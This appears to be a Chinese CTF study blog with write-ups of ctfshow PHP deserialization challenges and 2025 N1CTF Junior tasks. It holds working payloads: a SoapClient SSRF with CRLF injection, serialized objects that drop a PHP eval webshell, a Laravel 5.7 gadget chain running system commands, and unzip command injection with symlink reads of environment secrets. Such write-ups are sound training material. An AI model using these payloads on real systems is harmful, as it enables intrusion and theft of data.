$ua=\"ctfshownX-Forwarded-For:127.0.0.1,127.0.0.1nContent-Type: applicatio\nn\/x-www-form-urlencodednContent-Length:13nntoken=ctfshow\";<\/code><\/pre>\n\n\n\n\u8fd9\u2fa5\u6ce8\u610f\u5230length=13\uff0c\u5373token=ctfshow\uff0c\u8fd9\u6837\u5728\u53d6\u7684\u65f6\u5019\u5c31\u4e0d\u4f1a\u53d6\u5230\u540e\u2faf\u7684\u90e8\u5206<\/p>\n\n\n\n
<?php\n$ua=\"ctfshownX-Forwarded-For:127.0.0.1,127.0.0.1nContent-Type: applicatio\nn\/x-www-form-urlencodednContent-Length:13nntoken=ctfshow\";\n$client = new SoapClient(NULL,array('uri'=>\"http:\/\/127.0.0.1\",\"location\"=>\n\"http:\/\/127.0.0.1\/flag.php\",\"user_agent\"=>$ua));\necho urlencode(serialize($client));<\/code><\/pre>\n\n\n\nO%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A16%3A%22http%3A%2F%2F127.0.0.1%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A124%3A%22ctfshow%0AX-Forwarded-For%3A127.0.0.1%2C127.0.0.1%0AContentType%3A+application%2Fx-www-form-urlencoded%0AContent-Length%3A13%0A%0Atoken%3Dctfshow%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D<\/code><\/pre>\n\n\n\n\u4f20vip=\uff0c\u7136\u540e\u4f1a\u2f63\u6210flag.txt\uff0c\u8bbf\u95ee\u5373\u53ef<\/p>\n\n\n\n
web 260<\/h2>\n\n\n\n<?php\nerror_reporting(0);\nhighlight_file(__FILE__);\ninclude('flag.php');\nif(preg_match('\/ctfshow_i_love_36D\/',serialize($_GET['ctfshow']))){\necho $flag;\n}<\/code><\/pre>\n\n\n\n\u610f\u601d\u5c31\u662fctfshow\u5e8f\u5217\u5316\u4e4b\u540e\u6709\/ctfshow_i_love_36D\/ \u76f4\u63a5\u4f20\u5c31\u53ef\u4ee5\u4e86<\/p>\n\n\n\n
ctfshow=\/ctfshow_i_love_36D\/<\/code><\/pre>\n\n\n\nweb261<\/h2>\n\n\n\n<?php\nhighlight_file(__FILE__);\nclass ctfshowvip{\npublic $username;\npublic $password;\npublic $code;\npublic function __construct($u,$p){\n$this->username=$u;\n$this->password=$p;\n}\npublic function __wakeup(){\nif($this->username!='' || $this->password!=''){\ndie('error');\n}\n}\npublic function __invoke(){\neval($this->code);\n}\npublic function __sleep(){\n$this->username='';\n$this->password='';\n}\npublic function __unserialize($data){\n$this->username=$data['username'];\n$this->password=$data['password'];\n$this->code = $this->username.$this->password;\n}\npublic function __destruct(){\nif($this->code==0x36d){\nfile_put_contents($this->username, $this->password);\n}\n}\n}\nunserialize($_GET['vip']);<\/code><\/pre>\n\n\n\n\u6ce8\u610f\u5230public function invoke()\u4e2d\u6709\u2f00\u4e2aeval\uff0c\u90a3\u4e2a\u80af\u5b9a\u662f\u6211\u4eec\u60f3\u8981\u5f97\u5230\u7684<\/strong><\/p>\n\n\n\n\u5176\u6b21\uff0c\u5728__destruct()\u4e2d\u6709\u2f00\u4e2a\u2f42\u4ef6\u5199\u2f0a\u7684\u8fc7\u7a0b\uff0c\u5c06password\u5199\u2f0a\u5230username\u4e2d \u7136\u540e\u53ef\u4ee5\u6ce8\u610f\u5230\u2fa5\u2faf\u6709\u4e2a__unserialize<\/p>\n\n\n\n
\u5982\u679c __unserialize() \u548c __wakeup() \u4e24\u4e2a\u9b54\u672f\u2f45\u6cd5\u90fd\u5b9a\u4e49\u5728\u2f64\u2f00\u4e2a\u5bf9\u8c61\u4e2d\uff0c \u5219\u53ea\u6709 __unse rialize() \u2f45\u6cd5\u4f1a\u2f63\u6548\uff0c __wakeup() \u2f45\u6cd5\u4f1a\u88ab\u5ffd\u7565<\/p>\n\n\n\n
\u6240\u4ee5\u4e0d\u2f64\u62c5\u2f3c<\/p>\n\n\n\n
public function __wakeup(){\nif($this->username!='' || $this->password!=''){\ndie('error');\n}\n}<\/code><\/pre>\n\n\n\n$this->code==0x36d\u662f\u4e2a\u5f31\u2f50\u8f83\uff0ccode\u662fusername\u548cpassword\u62fc\u63a5\u5f97\u5230\u7684\uff0c\u53d6\u6570\u5b57\u90e8\u5206 0x36d\u768410\u8fdb\u5236\u662f877<\/p>\n\n\n\n
<?php\nclass ctfshowvip{\npublic $username = \"877.php\";\npublic $password = '<?php @eval($_GET[1]);?>';\n}\n$a = new ctfshowvip();\necho urlencode(serialize($a));\n?><\/code><\/pre>\n\n\n\nO%3A10%3A%22ctfshowvip%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A7%3A%22877.\nphp%22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%22%3C%3Fphp+%40eval%28%24_GET%5\nB1%5D%29%3B%3F%3E%22%3B%7D<\/code><\/pre>\n\n\n\n\u8fd0\u2f8f\u4e4b\u540e\u8bbf\u95ee\u2ee2\u5373\u53ef\uff0cflag\u5728\/flag_is_here<\/p>\n\n\n\n
WEB262<\/h2>\n\n\n\n<?php\n\/*\n# -*- coding: utf-8 -*\n# @Author: h1xa\n# @Date: 2020-12-03 02:37:19\n# @Last Modified by: h1xa\n# @Last Modified time: 2020-12-03 16:05:38\n# @message.php\n# @email: h1xa@ctfer.com\n# @link: https:\/\/ctfer.com\n*\/\nerror_reporting(0);\nclass message{\npublic $from;\npublic $msg;\npublic $to;\npublic $token='user';\npublic function __construct($f,$m,$t){\n$this->from = $f;\n$this->msg = $m;\n$this->to = $t;\n}\n}\n$f = $_GET['f'];\n$m = $_GET['m'];\n$t = $_GET['t'];\nif(isset($f) && isset($m) && isset($t)){\n$msg = new message($f,$m,$t);\n$umsg = str_replace('fuck', 'loveU', serialize($msg));\nsetcookie('msg',base64_encode($umsg));\necho 'Your message has been sent';\n}\nhighlight_file(__FILE__);<\/code><\/pre>\n\n\n\n\u6ce8\u91ca\u91cc\u9762message.php<\/p>\n\n\n\n
<?php\nhighlight_file(__FILE__);\ninclude('flag.php');\nclass message{\npublic $from;\npublic $msg;\npublic $to;\npublic $token='user';\npublic function __construct($f,$m,$t){\n$this->from = $f;\n$this->msg = $m;\n$this->to = $t;\n}\n}\nif(isset($_COOKIE['msg'])){\n$msg = unserialize(base64_decode($_COOKIE['msg']));\nif($msg->token=='admin'){\necho $flag;\n}\n}<\/code><\/pre>\n\n\n\n\u5982\u679c\u628auser\u53d8\u6210admin\uff0c\u5c31\u53ef\u4ee5\u62ff\u5230flag<\/p>\n\n\n\n
\u8003\u70b9\uff1a\u53cd\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u9003\u9038<\/p>\n\n\n\n
\u2fb8\u5148\u770b\u2f00\u6bb5\u4ee3\u7801<\/p>\n\n\n\n
<?php\nclass test{\npublic $username = \"user\";\npublic $password = \"user\";\n}\n$a = new test();\n$b = serialize($a);\nvar_dump($b);<\/code><\/pre>\n\n\n\n\u8fd0\u2f8f\u7ed3\u679c\u4e3a<\/p>\n\n\n\n
string(67) \"O:4:\"test\":2:{s:8:\"username\";s:4:\"user\";s:8:\"password\";s:4:\"use\nr\";}\"<\/code><\/pre>\n\n\n\n\u6784\u9020user\u4e2d\u7684\u5185\u5bb9<\/p>\n\n\n\n
\"O:4:\"test\":2:{s:8:\"username\";s:4:\"user\";s:8:\"password\";s:4:\"hack\";}user\";}\n\"<\/code><\/pre>\n\n\n\n$a = 'O:4:\"test\":2:{s:8:\"username\";s:4:\"user\";s:8:\"password\";s:4:\"hack\";}us\ner\";}';\nvar_dump(unserialize($a));<\/code><\/pre>\n\n\n\n\u8f93\u51fa<\/p>\n\n\n\n
object(__PHP_Incomplete_Class)#1 (3) {\n[\"__PHP_Incomplete_Class_Name\"]=>\nstring(4) \"test\"\n[\"username\"]=>\nstring(4) \"user\"\n[\"password\"]=>\nstring(4) \"hack\"\n}<\/code><\/pre>\n\n\n\n\u53ef\u4ee5\u53d1\u73b0\uff0c\u4e4b\u524d\u7684user user\u53d8\u6210\u4e86user hack<\/p>\n\n\n\n
\u518d\u770b\u9898\u2f6c\uff0c\u4f1a\u5c06fuck\u53d8\u6210loveU\uff0c\u53ef\u4ee5\u63a7\u5236\u7684\u4ece4\u4f4d\u53d8\u6210\u4e865\u4f4d<\/p>\n\n\n\n
\u2f7d\u9700\u8981\u6784\u9020\u7684\u662f<\/p>\n\n\n\n
\";s:5:\"token\";s:5:\"admin\";}<\/code><\/pre>\n\n\n\n\u4e3a27\u4f4d<\/p>\n\n\n\n
\u6240\u4ee5\u9700\u898127\u4e2afuck\u6765\u83b7\u5f97\u591a\u51fa\u6765\u7684\u53ef\u63a7\u5236\u4f4d<\/p>\n\n\n\n
?f=123&m=123&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck\nfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck\";s:5:\"token\";s:5:\"admin\";}<\/code><\/pre>\n\n\n\n\u8bbf\u95ee\/message.php<\/p>\n\n\n\n
web263<\/h2>\n\n\n\n
\u767b\u5f55\u754c\u2faf\uff0c\u6e90\u7801<\/p>\n\n\n\n
function check(){\n$.ajax({\nurl:'check.php',\ntype: 'GET',\ndata:{\n'u':$('#u').val(),\n'pass':$('#pass').val()\n},\nsuccess:function(data){\nalert(JSON.parse(data).msg);\n},\nerror:function(data){\nalert(JSON.parse(data).msg);\n}\n});\n}<\/code><\/pre>\n\n\n\nwww.zip\u6cc4\u6f0f \u4e0b\u8f7d\u6e90\u7801<\/p>\n\n\n\n
#index.php\n\u5173\u952e\u4ee3\u7801\nif(isset($_SESSION['limit'])){\n$_SESSION['limti']>5?die(\"\n\u767b\u9646\u5931\u8d25\u6b21\u6570\u8d85\u8fc7\u9650\u5236\n\"):$_SESSION['limit']=base6\n4_decode($_COOKIE['limit']);\n$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1)\n;\n}else{\nsetcookie(\"limit\",base64_encode('1'));\n$_SESSION['limit']= 1;\n}\n#inc.php\nclass User{\npublic $username;\npublic $password;\npublic $status;\nfunction __construct($username,$password){\n$this->username = $username;\n$this->password = $password;\n}\nfunction setStatus($s){\n$this->status=$s;\n}\nfunction __destruct(){\nfile_put_contents(\"log-\".$this->username, \"\n\u4f7f\u2f64\n\".$this->password.\n\"\n\u767b\u9646\n\".($this->status?\"\n\u6210\u529f\n\":\"\n\u5931\u8d25\n\").\"----\".date_create()->format('Y-m-d H:\ni:s'));\n}\n}<\/code><\/pre>\n\n\n\ncookie \u4e2d\u7684 limit \u8fdb\u2f8fbase64\u89e3\u7801\u4e4b\u540e\u4f20\u2f0asession\u4e2d\uff0c\u4e4b\u540e\u8c03\u2f64 inc \u4e2d\u7684 User \u7c7b\uff0c\u5e76\u4e14\u5176\u4e2d\u8fd9\u4e2a User \u7c7b\u4e2d\u5b58\u5728\u2f42\u4ef6\u5199\u2f0a\u51fd\u6570\uff0c\u6240\u4ee5\u5199\u2f0a\u2f00\u53e5\u8bdd<\/p>\n\n\n\n
<?php\nclass User{\npublic $username = 'ma.php';\npublic $password = '<?php system(\"tac flag.php\");?>';\npublic $status='ma';\n}\n$a=new User();\necho base64_encode('|'.serialize($a));\n?><\/code><\/pre>\n\n\n\nfE86NDoiVXNlciI6Mzp7czo4OiJ1c2VybmFtZSI7czo2OiJtYS5waHAiO3M6ODoicGFzc3dvcmQ\niO3M6MzE6Ijw\/cGhwIHN5c3RlbSgidGFjIGZsYWcucGhwIik7Pz4iO3M6Njoic3RhdHVzIjtzOj\nI6Im1hIjt9<\/code><\/pre>\n\n\n\n\u5e26\u7740cookie\u53bb\u8bbf index.php \uff0c\u63a5\u7740\u8bbf\u95ee inc\/inc.php \uff0c\u7136\u540e\u5c31\u4f1a\u2f63\u6210\u2f42\u4ef6 log-ma.php<\/p>\n\n\n\n
\u4e8e\u662f\u5199\u811a\u672c<\/p>\n\n\n\n
import requests\nurl = \"url\"\ncookies = {\"PHPSESSID\": \"a1keltr210l16p88sqdrrqrprj\", \"limit\": \"fE86NDoiVXN\nlciI6Mzp7czo4OiJ1c2VybmFtZSI7czo2OiJtYS5waHAiO3M6ODoicGFzc3dvcmQiO3M6MzE6Ij\nw\/cGhwIHN5c3RlbSgidGFjIGZsYWcucGhwIik7Pz4iO3M6Njoic3RhdHVzIjtzOjI6Im1hIjt9\"\n}\nres1 = requests.get(url + \"index.php\", cookies=cookies)\nPython\nres2 = requests.get(url + \"inc\/inc.php\", cookies=cookies)\nres3 = requests.get(url + \"log-ma.php\", cookies=cookies)\nprint(res3.text)<\/code><\/pre>\n\n\n\nweb264<\/h2>\n\n\n\nerror_reporting(0);\nsession_start();\nclass message{\npublic $from;\npublic $msg;\npublic $to;\npublic $token='user';\npublic function __construct($f,$m,$t){\n$this->from = $f;\n$this->msg = $m;\n$this->to = $t;\n}\n}\n$f = $_GET['f'];\n$m = $_GET['m'];\n$t = $_GET['t'];\nif(isset($f) && isset($m) && isset($t)){\n$msg = new message($f,$m,$t);\n$umsg = str_replace('fuck', 'loveU', serialize($msg));\n$_SESSION['msg']=base64_encode($umsg);\necho 'Your message has been sent';\n}\nhighlight_file(__FILE__);<\/code><\/pre>\n\n\n\nmessage.php<\/p>\n\n\n\n
<?php\nsession_start();\nhighlight_file(__FILE__);\ninclude('flag.php');\nclass message{\npublic $from;\npublic $msg;\npublic $to;\npublic $token='user';\npublic function __construct($f,$m,$t){\n$this->from = $f;\n$this->msg = $m;\n$this->to = $t;\n}\n}\nif(isset($_COOKIE['msg'])){\n$msg = unserialize(base64_decode($_SESSION['msg']));\nif($msg->token=='admin'){\necho $flag;\n}\n}<\/code><\/pre>\n\n\n\n\u770b\u4e86\u2f00\u4e0b\uff0c\u548cweb262\u76f8\u2f50\u5728message.php\u4e2d\u591a\u4e86\u53e5\u5f00\u5934\u7684session_start(); \u5c31\u2f64\u4e4b\u524d\u7684payload\u6253\uff0c\u53ea\u4e0d\u8fc7\u5728\u8bbf\u95eemessage.php\u7684\u65f6\u5019\u8981\u4f7fmsg\u6709\u503c<\/p>\n\n\n\n![\"image-20260104225621086\"](\"https:\/\/bucketqiao123456.oss-cn-beijing.aliyuncs.com\/image-20260104225621086.png\")
<\/figure>\n\n\n\nweb271<\/h2>\n\n\n\n<?php\n\/**\n * Laravel - A PHP Framework For Web Artisans\n *\n * @package Laravel\n * @author Taylor Otwell <taylor@laravel.com>\n *\/\ndefine('LARAVEL_START', microtime(true));\n\/*\n|--------------------------------------------------------------------------\n| Register The Auto Loader\n|--------------------------------------------------------------------------\n|\n| Composer provides a convenient, automatically generated class loader for\n| our application. We just need to utilize it! We'll simply require it\n| into the script here so that we don't have to worry about manual\n| loading any of our classes later on. It feels great to relax.\n|\n*\/\nrequire __DIR__ . '\/..\/vendor\/autoload.php';\n\/*\n|--------------------------------------------------------------------------\n| Turn On The Lights\n|--------------------------------------------------------------------------\n|\n| We need to illuminate PHP development, so let us turn on the lights.\n| This bootstraps the framework and gets it ready for use, then it\n| will load up this application so that we can run it and send\n| the responses back to the browser and delight our users.\n|\n*\/\n$app = require_once __DIR__ . '\/..\/bootstrap\/app.php';\n\/*\n|--------------------------------------------------------------------------\n| Run The Application\n|--------------------------------------------------------------------------\n|\n| Once we have the application, we can handle the incoming request\n| through the kernel, and send the associated response back to\n| the client's browser allowing them to enjoy the creative\n| and wonderful application we have prepared for them.\n|\n*\/\n$kernel = $app->make(IlluminateContractsHttpKernel::class);\n$response = $kernel->handle(\n$request = IlluminateHttpRequest::capture()\n);\n@unserialize($_POST['data']);\nhighlight_file(__FILE__);\n$kernel->terminate($request, $response);<\/code><\/pre>\n\n\n\n\u8003\u7684\u662flaravel5.7\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e<\/p>\n\n\n\n
<?php\nnamespace IlluminateFoundationTesting{\nclass PendingCommand{\nprotected $command;\nprotected $parameters;\nprotected $app;\npublic $test;\npublic function __construct($command, $parameters,$class,$app)\n{\n$this->command = $command;\n$this->parameters = $parameters;\n$this->test=$class;\n$this->app=$app;\n}\n}\n}\nnamespace IlluminateAuth{\nclass GenericUser{\nprotected $attributes;\npublic function __construct(array $attributes){\n$this->attributes = $attributes;\n}\n}\n}\nnamespace IlluminateFoundation{\nclass Application{\nprotected $hasBeenBootstrapped = false;\nprotected $bindings;\npublic function __construct($bind){\n$this->bindings=$bind;\n}\n}\n}\nnamespace{\necho urlencode(serialize(new IlluminateFoundationTestingPendingComm\nand(\"system\",array('cat \/flag'),new IlluminateAuthGenericUser(array(\"exp\nectedOutput\"=>array(\"0\"=>\"1\"),\"expectedQuestions\"=>array(\"0\"=>\"1\"))),new I\nlluminateFoundationApplication(array(\"IlluminateContractsConsoleKerne\nl\"=>array(\"concrete\"=>\"IlluminateFoundationApplication\"))))));\n }\n?><\/code><\/pre>\n\n\n\n\u5b8c\u6bd5\uff0c\u5f97\u5230flag<\/p>\n\n\n\n
\u5b66\u4e60\u8ba1\u5212<\/h2>\n\n\n\n
\u73b0\u5728\u7684\u8ba1\u5212\u662f\u4ee5\u9898\u578b\u4e3a\u5355\u4f4d\uff0c\u4e00\u4e2a\u4e2a\u7ee7\u7eed\u7cbe\u8fdb\uff0c\u76ee\u524d\u5927\u81f4\u5b8c\u6210\u7684\u6709\u6587\u4ef6\u5305\u542b\uff0c\u4e0a\u4f20\uff0csql\u6ce8\u5165\uff0cXSS\uff0c\u53cd\u5e8f\u5217\u5316\u7b49\uff08\u9650CTFshow\u4e0a\u7684\u9898\u76ee\u7ec3\u4e60\u5b8c\u6bd5\uff09\uff0c\u4e0b\u5468\u5f00\u59cb\u8981\u7ed9\u70b9\u65f6\u95f4\u5b66\u4e00\u5b66JAVA\u4e86\uff0c\u7136\u540e\u5c31\u662fSSTI \u548cXXE<\/p>\n\n\n\n
\u4e4b\u524d\u5c31\u60f3\u8bf4\uff0c\u73b0\u5728web\u9898\u7ed9\u6211\u7684\u611f\u89c9\u5df2\u7ecf\u4e0d\u662f\u5355\u7eaf\u8003\u4e00\u4e24\u4e2a\u77e5\u8bc6\u70b9\u4e86\uff0c\u800c\u662f\u5341\u5206\u6709\u7efc\u5408\u6027\u7684\u8003\u5bdf\u548c\u6311\u6218\uff0c\u56e0\u6b64\u89c9\u5f97\u6574\u4f53\u77e5\u8bc6\u7684\u638c\u63e1\u66f4\u52a0\u91cd\u8981\u3002\u4e00\u6b65\u6b65\u597d\u597d\u8d70\u5427\uff0c\u811a\u8e0f\u5b9e\u5730\u5341\u5206\u91cd\u8981\uff0c\u6211\u4e5f\u4f1a\u7ee7\u7eed\u52aa\u529b\u7684<\/p>\n\n\n\n
\u7b2c1.5–1.11\u5468<\/h2>\n\n\n\n
\u672c\u5468\u505a\u4e86\u4e24\u5e74\u7684N1 junior\u9898\uff0c\u611f\u89c9\u4e2d\u7b49\u504f\u96be\uff0c\u4f46\u662f\u5f88\u6709\u6536\u83b7\uff0c\u8fde\u7eed\u505a\u5230\u7684\u4e24\u5e74\u7684\u90fd\u8003\u4e86\u5185\u5b58\uff0c\u611f\u89c9\u50cf\u662f\u4e4b\u524d\u7b2c\u4e09\u5468\u7684\u65f6\u5019\u505a\u7684\u6781\u5ba2\u5927\u6311\u6218Vibe-SEO\u7684\u6587\u4ef6\u63cf\u8ff0\u7b26\uff0c\u597d\u4e45\u4e4b\u524d\u7684\u77e5\u8bc6\u70b9\u6ca1\u60f3\u5230\u5728\u8fd9\u4e2a\u5730\u65b9\u6df1\u5316\u5b66\u4e60\u4e86\u4e00\u4e0b,\u6b63\u597d\u5728\u8fd9\u91cc\u603b\u7ed3\u4e00\u4e0b\u5427<\/p>\n\n\n\n
\/proc\/self\/mem\u662f\u4e00\u4e2a\u865a\u62df\u6587\u4ef6\uff0c\u4ee3\u8868\u4e86\u8fdb\u7a0b\u7684\u6574\u4e2a\u865a\u62df\u5730\u5740\u7a7a\u95f4\u3002\n\n\u5f53\u4e00\u4e2a\u8fdb\u7a0b\u4f7f\u7528open(\"\/proc\/self\/mem\", O_RDONLY)\u65f6\uff0c\u7cfb\u7edf\u4f1a\u5206\u914d\u4e00\u4e2aFD\uff08\u6587\u4ef6\u63cf\u8ff0\u7b26\uff09\u7ed9\u8fd9\u4e2a\u6253\u5f00\u7684\u6587\u4ef6\u3002\n\n\u4e00\u65e6\u83b7\u5f97\u4e86\u6307\u5411mem\u7684 FD\uff0c\u5c31\u53ef\u4ee5\u4f7f\u7528lseek(fd, offset, SEEK_SET)\u6765\u5b9a\u4f4d\u5230\u5185\u5b58\u4e2d\u7684\u5177\u4f53\u5730\u5740\uff08\u5c31\u662fN1 junior\u9898\u7684\u90a3\u4e2aoffset\uff09\uff0c\u7136\u540e\u4f7f\u7528 read(fd, buf, length) \u5c06\u5185\u5b58\u6570\u636e\u8bfb\u5165\u7f13\u51b2\u533a\uff0c\u8fdb\u800c\u8bfb\u53d6\u6587\u4ef6\n\n\u5c31\u50cf\u6781\u5ba2\u5927\u6311\u6218\u7684\u9898\u4e2d\u4e00\u6837\uff0c\u5982\u679c\u62e5\u6709\u4e00\u4e2a\u6307\u5411 \/proc\/self\/mem \u7684 FD\uff0c\u53ef\u4ee5\u901a\u8fc7\/proc\/self\/fd\/num\u6765\u8bbf\u95ee\n\u8fd8\u53ef\u4ee5\u7528\u6765\u901a\u8fc7\u7b97\u5730\u5740\u6765\u8bfb\u5230\u6307\u5b9a\u7684\u5305\u542bsystem\u51fd\u6570\u5730\u5740\u6587\u4ef6\uff0c\u5199POC\u8fbe\u5230RCE\uff082024 N1 junior Gavatar\uff09<\/code><\/pre>\n\n\n\n2025 N1CTF Junior 2\/2<\/h3>\n\n\n\nonline_unzipper<\/h4>\n\n\n\n
\u9898\u76ee\u662f\u4e00\u4e2a\u5728\u7ebf\u7684zip\u89e3\u538b\u5de5\u5177\uff0c\u53ef\u4ee5\u731c\u60f3\u5230symlink\u900f\u6570\u636e \/proc\/self\/cmdline<\/p>\n\n\n\n
\u540c\u6837\u7684\u65b9\u6cd5\u8bfb \/proc\/self\/environ \u62ff\u5230FLASK_SECRET_KEY=#mu0cw9F#7bBCoF!<\/p>\n\n\n\n
HOSTNAME=5ab9cde86ead HOME=\/root GPG_KEY=A035C8C19219BA821ECEA86B64E628F8D684696D PYTHON_SHA256=8d3ed8ec5c88c1c95f5e558612a725450d2452813ddad5e58fdb1a53b1209b78 FLASK_APP=app.py FLASK_RUN_HOST=0.0.0.0 PATH=\/usr\/local\/bin:\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin LANG=C.UTF-8<\/code><\/pre>\n\n\n\n\u518d\u8bfbapp.py\u62ff\u5230\u6e90\u7801<\/p>\n\n\n\n
import os\nimport uuid\nfrom flask import Flask, request, redirect, url_for,send_file,render_template, session, send_from_directory, abort, Response\n\napp = Flask(__name__)\napp.secret_key = os.environ.get(\"FLASK_SECRET_KEY\", \"test_key\")\nUPLOAD_FOLDER = os.path.join(os.getcwd(), \"uploads\")\nos.makedirs(UPLOAD_FOLDER, exist_ok=True)\n\nusers = {}\n\n@app.route(\"\/\")\ndef index():\n if \"username\" not in session:\n return redirect(url_for(\"login\"))\n return redirect(url_for(\"upload\"))\n\n@app.route(\"\/register\", methods=[\"GET\", \"POST\"])\ndef register():\n if request.method == \"POST\":\n username = request.form[\"username\"]\n password = request.form[\"password\"]\n\n if username in users:\n return \"\u7528\u6237\u540d\u5df2\u5b58\u5728\"\n\n users[username] = {\"password\": password, \"role\": \"user\"}\n return redirect(url_for(\"login\"))\n\n return render_template(\"register.html\")\n\n@app.route(\"\/login\", methods=[\"GET\", \"POST\"])\ndef login():\n if request.method == \"POST\":\n username = request.form[\"username\"]\n password = request.form[\"password\"]\n\n if username in users and users[username][\"password\"] == password:\n session[\"username\"] = username\n session[\"role\"] = users[username][\"role\"]\n return redirect(url_for(\"upload\"))\n else:\n return \"\u7528\u6237\u540d\u6216\u5bc6\u7801\u9519\u8bef\"\n\n return render_template(\"login.html\")\n\n@app.route(\"\/logout\")\ndef logout():\n session.clear()\n return redirect(url_for(\"login\"))\n\n@app.route(\"\/upload\", methods=[\"GET\", \"POST\"])\ndef upload():\n if \"username\" not in session:\n return redirect(url_for(\"login\"))\n\n if request.method == \"POST\":\n file = request.files[\"file\"]\n if not file:\n return \"\u672a\u9009\u62e9\u6587\u4ef6\"\n\n role = session[\"role\"]\n\n if role == \"admin\":\n dirname = request.form.get(\"dirname\") or str(uuid.uuid4())\n else:\n dirname = str(uuid.uuid4())\n\n target_dir = os.path.join(UPLOAD_FOLDER, dirname)\n os.makedirs(target_dir, exist_ok=True)\n\n zip_path = os.path.join(target_dir, \"upload.zip\")\n file.save(zip_path)\n\n try:\n os.system(f\"unzip -o {zip_path} -d {target_dir}\")\n except:\n return \"\u89e3\u538b\u5931\u8d25\uff0c\u8bf7\u68c0\u67e5\u6587\u4ef6\u683c\u5f0f\"\n\n os.remove(zip_path)\n return f\"\u89e3\u538b\u5b8c\u6210\uff01<br>\u4e0b\u8f7d\u5730\u5740: <a href='{url_for('download', folder=dirname)}'>{request.host_url}download\/{dirname}<\/a>\"\n\n return render_template(\"upload.html\")\n\n@app.route(\"\/download\/<folder>\")\ndef download(folder):\n target_dir = os.path.join(UPLOAD_FOLDER, folder)\n if not os.path.exists(target_dir):\n abort(404)\n\n files = os.listdir(target_dir)\n return render_template(\"download.html\", folder=folder, files=files)\n\n@app.route(\"\/download\/<folder>\/<filename>\")\ndef download_file(folder, filename):\n file_path = os.path.join(UPLOAD_FOLDER, folder ,filename)\n try:\n with open(file_path, 'r') as file:\n content = file.read()\n return Response(\n content,\n mimetype=\"application\/octet-stream\",\n headers={\n \"Content-Disposition\": f\"attachment; filename={filename}\"\n }\n )\n except FileNotFoundError:\n return \"File not found\", 404\n except Exception as e:\n return f\"Error: {str(e)}\", 500\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\")<\/code><\/pre>\n\n\n\n\u4fee\u6539 session \u7684 role \u4e3a admin\uff0c\u6210\u4e3a\u7ba1\u7406\u5458\u540e\u53ef\u6307\u5b9a\u4e0a\u4f20\u6587\u4ef6\u7684\u4f4d\u7f6e<\/p>\n\n\n\n
\u4f2a\u9020cookie\u5c31\u884c\u4e86<\/p>\n\n\n\n
os.system(f\"unzip -o {zip_path} -d {target_dir}\")<\/code><\/pre>\n\n\n\n\u5176\u4e2d\u7684target_dir\u53ef\u4ee5\u901a\u8fc7admin\u7528\u6237\u6765\u63a7\u5236<\/p>\n\n\n\n
\u8fd9\u91cc\u7684role\u662f\u901a\u8fc7session\u83b7\u53d6\u7684 role = session[“role”]<\/p>\n\n\n\n![\"image-20260111200617102\"](\"Users18636AppDataRoamingTyporatypora-user-imagesimage-20260111200617102.png\")
<\/figure>\n\n\n\n\u8fd9\u91cc\u5c31\u53ef\u4ee5\u5f00\u59cb\u6784\u9020\u547d\u4ee4\u4e86test;ls \/ > \/tmp\/1.txt<\/p>\n\n\n\n
\u540c\u6837\u901a\u8fc7\u8f6f\u94fe\u63a5\u8bfb\u53d6\/tmp\/1.txt<\/p>\n\n\n\n
app\nbin\nboot\ndev\nentrypoint.sh\netc\nflag-BBv4itllamUqk6K9Y8vOpNQw3wiRZEqX.txt\nhome\nleo\nlib\nlib64\nmedia\nmnt\nopt\npasswd3\nproc\nroot\nrun\nsbin\nsrv\nsys\ntmp\nusr\nvar<\/code><\/pre>\n\n\n\n\u76f4\u63a5\u8f6f\u94fe\u63a5\u8bfbflag-BBv4itllamUqk6K9Y8vOpNQw3wiRZEqX.txt<\/p>\n\n\n\n
ping<\/h4>\n\n\n\nimport base64\nimport subprocess\nimport re\nimport ipaddress\nimport flask\n\ndef run_ping(ip_base64):\n try:\n decoded_ip = base64.b64decode(ip_base64).decode('utf-8')\n if not re.match(r'^d+.d+.d+.d+$', decoded_ip):\n return False\n if decoded_ip.count('.') != 3:\n return False\n\n if not all(0 <= int(part) < 256 for part in decoded_ip.split('.')):\n return False\n if not ipaddress.ip_address(decoded_ip):\n return False\n if len(decoded_ip) > 15:\n return False\n if not re.match(r'^[A-Za-z0-9+\/=]+$', ip_base64):\n return False\n except Exception as e:\n return False\n command = f\"\"\"echo \"ping -c 1 $(echo '{ip_base64}' | base64 -d)\" | sh\"\"\"\n\n try:\n process = subprocess.run(\n command,\n shell=True,\n check=True,\n capture_output=True,\n text=True\n )\n return process.stdout\n except Exception as e:\n return False\n\napp = flask.Flask(__name__)\n\n@app.route('\/ping', methods=['POST'])\ndef ping():\n data = flask.request.json\n ip_base64 = data.get('ip_base64')\n if not ip_base64:\n return flask.jsonify({'error': 'no ip'}), 400\n\n result = run_ping(ip_base64)\n if result:\n return flask.jsonify({'success': True, 'output': result}), 200\n else:\n return flask.jsonify({'success': False}), 400\n\n@app.route('\/')\ndef index():\n return flask.render_template('index.html')\n\napp.run(host='0.0.0.0', port=5000)<\/code><\/pre>\n\n\n\n\u8fc7\u6ee4\u53ea\u80fd\u662fip<\/code>\u7684\u6b63\u5e38\u683c\u5f0f\uff0c\u957f\u5ea6\u4e5f\u53d7\u9650\u5236<\/p>\n\n\n\n\u91cd\u70b9\u5173\u6ce8command = f”””echo “ping -c 1 $(echo ‘{ip_base64}’ | base64 -d)” | sh”””<\/p>\n\n\n\n
